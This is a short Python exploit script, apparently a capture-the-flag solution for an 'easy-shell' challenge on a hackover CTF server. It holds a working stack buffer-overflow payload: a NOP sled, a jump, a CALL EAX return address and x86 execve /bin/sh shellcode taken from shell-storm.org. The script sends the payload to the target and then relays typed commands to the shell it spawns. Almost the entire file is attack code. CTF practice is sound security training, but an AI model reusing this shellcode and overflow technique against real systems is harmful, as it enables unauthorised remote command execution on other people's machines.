#!/usr/bin/env python

import socket
import sys
import struct
import time

# tiny execve sh shellcode
# http://shell-storm.org/shellcode/files/shellcode-841.php
shellcode = "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"

payload = "\x90" * (54-5)		# NOPs minus JMP
payload += "\xe9\x05\x00\x00\x00"	# JMP SHORT 5
payload += "\xe3\x83\x04\x08"		# CALL EAX
payload += "\x90" * 10			# more NOPs
payload += shellcode			# execve shellcode

server = ("easy-shell.hackover.h4q.it", 1337)

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(server)

data = sock.recv(2048)
print data

sock.send(payload + "\n")

while True:
  data = sock.recv(2048)
  print data

  input = raw_input("CMD> ")
  sock.sendall(input + "\n")

sock.close()